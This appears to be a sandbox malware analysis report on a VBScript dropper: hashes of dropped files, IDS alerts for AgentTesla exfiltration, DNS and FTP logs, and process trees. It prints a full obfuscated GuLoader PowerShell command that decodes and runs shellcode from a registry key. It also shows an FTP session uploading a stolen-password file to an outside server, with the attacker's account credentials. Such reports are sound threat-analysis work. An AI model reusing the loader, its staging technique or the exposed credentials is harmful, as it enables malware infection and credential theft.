                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fAzxs7+AEszICN23fyAn:p37Lvkmb6KmYWZE7V
                                MD5:5782379115A5C7704ACCE3E9383AF816
                                SHA1:60D28D5DDD965175CB39C6BB0DF5AC1A224BCEC0
                                SHA-256:7604F449D890B1488ACFB0DDACABA6E1E24A51097835E4B47A35B507657EBD7B
                                SHA-512:A5AC3636A13572513032E3AF1253FE244AD76950FD508A04C101E0C92C2A946B4E012E28D6805DA3AE41CDF131A6B03CA89A0ECD188AD2E47756CAAAD9D9FDA4
                                Malicious:true
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs"
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.0750833499217003
                                Encrypted:false
                                SSDEEP:48:6VJk5TZxiz1MDgQzufTbFukMAx7551ul6a3eq:OIWz1MDgVfTSACsK
                                MD5:CA1B80C27B39A8FF11303A0A90CB8ACC
                                SHA1:3558A01472147CD4D7509DDEFA51F9E4F437172B
                                SHA-256:FFE5482B92E9206F567B6F96DB1FDE3117BE892D717769DF78197A52198486F6
                                SHA-512:1DE5FE8955B5DD27C311423AC59E184B8823353AAC34BF90A0F66EC0BEDFB39D82C210F589505D1A806FDF152DD69D0FDB5BE8EEAB36EA19A5A628C40B08ED73
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.c...........!................^&... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@&......H.......P ..............................................................BSJB............v4.0.30319......l...t...#~......@...#Strings.... .......#US.(.......#GUID...8...|...#Blob...........G.........%3............................................................0.).....f.....f.......................................... 7............ D............ U............ ^............ i............ y.$.......... ..).......... ..1.......... ..7.......... ..=.......... ..)...................
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):866
                                Entropy (8bit):5.33012640290001
                                Encrypted:false
                                SSDEEP:12:xKqR37Lvkmb6KmYWZE7wKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Aqd3ka6KmpE7wKax5DqBVKVrdFAMBJTH
                                MD5:419D835EDD086DBCD1FB8CAFE131A363
                                SHA1:F02C01889D4EB029501F2842FED63BEE75A32AAC
                                SHA-256:C95EF9EFF8E1F8076E9C103BD88E939445D3E45956155401AF076E08F81C1D24
                                SHA-512:D56124B2E20DF3848BBB3B15C3C30B3F6D7019312D5D6E07ADDA6A6741C66BEF5B96DB38727021864D1AF1EE243024BDFD8735BAA98EBDF3292A4CEA7195BFC7
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.101934875256757
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLAak7Ynqq2lPN5Dlq5J:+RI+ycuZhNpAakS2lPNnqX
                                MD5:1A68EE12BE04A630C8BF56D4F7473ED0
                                SHA1:ED9048C3B8B4013A63E612FF08CD59512E49A3FD
                                SHA-256:B37612CBD66EF7BDD73717ADB5C978216B44420DED73796AD570D0FE6DD8D24D
                                SHA-512:F03CD19608B470B8AF2154A212BC6A5E75AFB7C0C0975AE0E2A28A33BE0E721F60B0491FFDBC23568F9B5A2D9C2DC7E9E4A7850D9908C6AD437942AEAD83AFF5
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 18:34:00 2022, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1332
                                Entropy (8bit):4.001985755678852
                                Encrypted:false
                                SSDEEP:24:H9zW9Y89G/8qH9QwKPfwI+ycuZhNpAakS2lPNnqS2d:xiG/8qFKPo1ul6a3eqSG
                                MD5:F4BF383029179F79AE0437C25B9B88AC
                                SHA1:51A35E88821784CBC14768F2F96D9A4AFD88DDB0
                                SHA-256:CD999401D357C7AB4F043A403294A91E994DA74376E032E0CD0A5F9DD8618A91
                                SHA-512:8973B94881E0E57C1D2868DFE1965988072C9796077DDE07E685F59F534CA60CC3F72C60859F40177EDC879EB0C55016CD43BA779A972C639E75FFD19FCDA68A
                                Malicious:false
                                Preview:L....P.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP...................h.....0.V..G>...........5.......C:\Users\user\AppData\Local\Temp\RES7743.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):30
                                Entropy (8bit):3.964735178725505
                                Encrypted:false
                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                MD5:9F754B47B351EF0FC32527B541420595
                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                Malicious:false
                                Preview:NordVPN directory not found!..
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.836608054626225
                                TrID:
                                  File name:SIEM_PO00938467648.vbs
                                  File size:350795
                                  MD5:633811bccf3fe62978ce41a04b653083
                                  SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
                                  SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
                                  SHA512:ade8c018c14b2c9de5df6c9c82130c309fd85084137d6e919c42b6fe7abb5ffde356f2d951f33ec3355df88f7134d51f66121afa3c7ca9f7bac047e0b73d0fa7
                                  SSDEEP:6144:J8YNxYPOwuvNR5vwfZKU2fU/5Mhc1gXcSGN+DieVwzjb6HZIKK:uijvPFWNEClgsSgpeVf6KK
                                  TLSH:AB74AE5DDA28DACD4F4E2F4ADC821A47C4654623D02614F9EEB5CB8E11C2ECDCE293D8
                                  File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                                  Icon Hash:e8d69ece869a9ec4
                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                  11/29/22-18:34:46.981738 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49858 | 21 | 192.168.11.20 | 185.31.121.136
                                  11/29/22-18:34:47.016884 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49859 | 59772 | 192.168.11.20 | 185.31.121.136
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Nov 29, 2022 18:34:32.433917046 CET | 56557 | 53 | 192.168.11.20 | 1.1.1.1
                                  Nov 29, 2022 18:34:32.476682901 CET | 53 | 56557 | 1.1.1.1 | 192.168.11.20
                                  Nov 29, 2022 18:34:38.424631119 CET | 50934 | 53 | 192.168.11.20 | 1.1.1.1
                                  Nov 29, 2022 18:34:38.434093952 CET | 53 | 50934 | 1.1.1.1 | 192.168.11.20
                                  Nov 29, 2022 18:34:46.357691050 CET | 56134 | 53 | 192.168.11.20 | 1.1.1.1
                                  Nov 29, 2022 18:34:46.629107952 CET | 53 | 56134 | 1.1.1.1 | 192.168.11.20
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Nov 29, 2022 18:34:32.433917046 CET | 192.168.11.20 | 1.1.1.1 | 0x7526 | Standard query (0) | qwedft.gq | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:38.424631119 CET | 192.168.11.20 | 1.1.1.1 | 0x2534 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:46.357691050 CET | 192.168.11.20 | 1.1.1.1 | 0x1eec | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Nov 29, 2022 18:34:32.476682901 CET | 1.1.1.1 | 192.168.11.20 | 0x7526 | No error (0) | qwedft.gq | - | 162.240.62.179 | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:38.434093952 CET | 1.1.1.1 | 192.168.11.20 | 0x2534 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:38.434093952 CET | 1.1.1.1 | 192.168.11.20 | 0x2534 | No error (0) | api.ipify.org.herokudns.com | - | 52.20.78.240 | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:38.434093952 CET | 1.1.1.1 | 192.168.11.20 | 0x2534 | No error (0) | api.ipify.org.herokudns.com | - | 3.220.57.224 | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:38.434093952 CET | 1.1.1.1 | 192.168.11.20 | 0x2534 | No error (0) | api.ipify.org.herokudns.com | - | 54.91.59.199 | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:38.434093952 CET | 1.1.1.1 | 192.168.11.20 | 0x2534 | No error (0) | api.ipify.org.herokudns.com | - | 3.232.242.170 | A (IP address) | IN (0x0001) | false
                                  Nov 29, 2022 18:34:46.629107952 CET | 1.1.1.1 | 192.168.11.20 | 0x1eec | No error (0) | ftp.mcmprint.net | - | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                                  • api.ipify.org
                                  • qwedft.gq
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                  Nov 29, 2022 18:34:46.696629047 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220-You are user number 1 of 50 allowed.
                                      220-Local time is now 19:34. Server port: 21.
                                      220-This is a private system - No anonymous login
                                      220-IPv6 connections are also welcome on this server.
                                      220 You will be disconnected after 15 minutes of inactivity.
                                  Nov 29, 2022 18:34:46.696991920 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | USER klogz@mcmprint.net
                                  Nov 29, 2022 18:34:46.729505062 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 331 User klogz@mcmprint.net OK. Password required
                                  Nov 29, 2022 18:34:46.729799986 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | PASS l9Hh{#_(0shZ
                                  Nov 29, 2022 18:34:46.780364990 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 230 OK. Current restricted directory is /
                                  Nov 29, 2022 18:34:46.813596010 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 504 Unknown command
                                  Nov 29, 2022 18:34:46.813944101 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | PWD
                                  Nov 29, 2022 18:34:46.846718073 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 257 "/" is your current location
                                  Nov 29, 2022 18:34:46.847259998 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | CWD /
                                  Nov 29, 2022 18:34:46.879990101 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 250 OK. Current directory is /
                                  Nov 29, 2022 18:34:46.880294085 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | TYPE I
                                  Nov 29, 2022 18:34:46.912998915 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 200 TYPE is now 8-bit binary
                                  Nov 29, 2022 18:34:46.913393021 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | PASV
                                  Nov 29, 2022 18:34:46.946330070 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 227 Entering Passive Mode (185,31,121,136,233,124)
                                  Nov 29, 2022 18:34:46.981738091 CET | 49858 | 21 | 192.168.11.20 | 185.31.121.136 | STOR PW_user-888683_2022_11_29_18_34_43.html
                                  Nov 29, 2022 18:34:47.016505957 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 150 Accepted data connection
                                  Nov 29, 2022 18:34:47.049491882 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 226-File successfully transferred
                                      226 0.033 seconds (measured here), 13.16 Kbytes per second
                                  Nov 29, 2022 18:36:26.444715977 CET | 21 | 49858 | 185.31.121.136 | 192.168.11.20 | 226 Logout.


                                  Target ID:2
                                  Start time:18:33:27
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
                                  Imagebase:0x7ff7414d0000
                                  File size:170496 bytes
                                  MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Target ID:4
                                  Start time:18:33:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:CMD.EXE /c echo C:\Windows
                                  Imagebase:0x7ff687d50000
                                  File size:289792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Target ID:5
                                  Start time:18:33:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f8160000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:6
                                  Start time:18:33:33
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe 
VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp 
er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;;
                                  Imagebase:0x910000
                                  File size:433152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Target ID:7
                                  Start time:18:33:33
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f8160000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:10
                                  Start time:18:33:59
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
                                  Imagebase:0x610000
                                  File size:2141552 bytes
                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  Target ID:11
                                  Start time:18:34:00
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
                                  Imagebase:0x5a0000
                                  File size:46832 bytes
                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Target ID:12
                                  Start time:18:34:20
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                  Imagebase:0xcd0000
                                  File size:106496 bytes
                                  MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
